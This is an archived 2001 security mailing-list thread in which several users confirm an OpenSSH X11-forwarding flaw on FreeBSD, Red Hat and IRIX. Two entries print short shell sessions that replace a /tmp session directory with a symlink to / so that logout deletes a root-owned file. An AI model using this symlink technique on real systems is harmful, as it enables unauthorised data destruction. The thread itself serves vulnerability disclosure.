Tomas Ericsson <teat_private> The vulnerability works perfectly for me: sshd version OpenSSH_2.3.0 greenat_private 20010321 # uname -a FreeBSD myhost 4.3-RELEASE FreeBSD 4.3-RELEASE #0: Sun Apr 22 01:05:25 GMT 2001 rootat_private:/usr/src/sys/compile/GENERIC alpha [root@myhost root]# echo "testing">/cookies [root@myhost root]# ls -l /cookies -rw-r--r-- 1 root wheel 8 Jun 5 01:48 /cookies [root@myhost root]# ssh -l te myhost [te@myhost te]# rm -rf /tmp/ssh-1i24iea5 [te@myhost te]# ln -s / /tmp/ssh-1i24iea5 [te@myhost te]# logout [root@myhost root]# ls -l /cookies ls: /cookies: No such file or directory Shannon Lee <shannonat_private> reproduced with OpenSSH_2.3.0p1 on redhat 6.2. TE <teat_private> This vulnerability works fine on both RedHat 7.1 & 7.0 with the latest updated packages from RedHat installed. RH71# uname -a Linux host1 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknown RH71# rpm -qa|grep openssh-server openssh-server-2.5.2p2-5 RH70# uname -a Linux host2 2.2.19-7.0.1 #1 Tue Apr 10 01:56:16 EDT 2001 i686 unknown RH70# rpm -qa|grep openssh-server openssh-server-2.5.2p2-1.7.2 "David Thiel" <dthielat_private> I tested this on 4.3-RELEASE, and was successful. SSH Version OpenSSH_2.3.0 greenat_private 20010321 KF <dotslashat_private> Works on my box [root@bounce dotslash]# cat /etc/redhat-release Red Hat Linux release 7.0 (Guinness) root@bounce dotslash]# ssh -V SSH Version OpenSSH_2.1.1, protocol versions 1.5/2.0. Compiled with SSL (0x0090581f). Jan-Frode Myklebust <janfrodeat_private> I just tested with OpenSSH_2.5.2p2 on RedHat 7.0, and OpenSSH_2.9p1 on IRIX 6.5 and both are vulnerable to this. I used protocol version 2 on both machines. Luciano Miguel Ferreira Rocha <strangeat_private> Confirmied on RedHat 7.0 w/ OpenSSH 2.5.2p1. It needs, of course, to have X forwarding activated. "Golden_Eternity" <bhodiat_private> I tried to reproduce this on a system running ssh 2.4.0, but I was unable to locate the /tmp/ssh-* directory. What version of ssh were you using when you discovered this? [test@shiva test]$ ssh test@localhost warning: Need basic cursor movement capablity, using vt100 test's password: Authentication successful. Last login: Mon Jun 04 2001 10:42:08 -0700 No mail. [test@shiva test]$ ls -l /tmp/ total 12 drwxr-xr-x 2 root root 12288 Apr 8 11:59 lost+found [test@shiva test]$ "Schlosser, Matt D." <mschlosserat_private On the contrary, it just takes another form: [root@bob /root]# touch /cookies;ls /cookies /cookies [root@bob /root]# ssh zen@localhost zen@localhost's password: [zen@bob zen]$ rm -r /tmp/orbit-zen/; ln -s / /tmp/orbit-zen [zen@bob zen]$ logout Connection to localhost closed. [root@bob /root]# ls /cookies /bin/ls: /cookies: No such file or directory -- Elias Levy SecurityFocus.com http://www.securityfocus.com/ Si vis pacem, para bellum
This archive was generated by hypermail 2b30 : Tue Jun 05 2001 - 14:42:58 PDT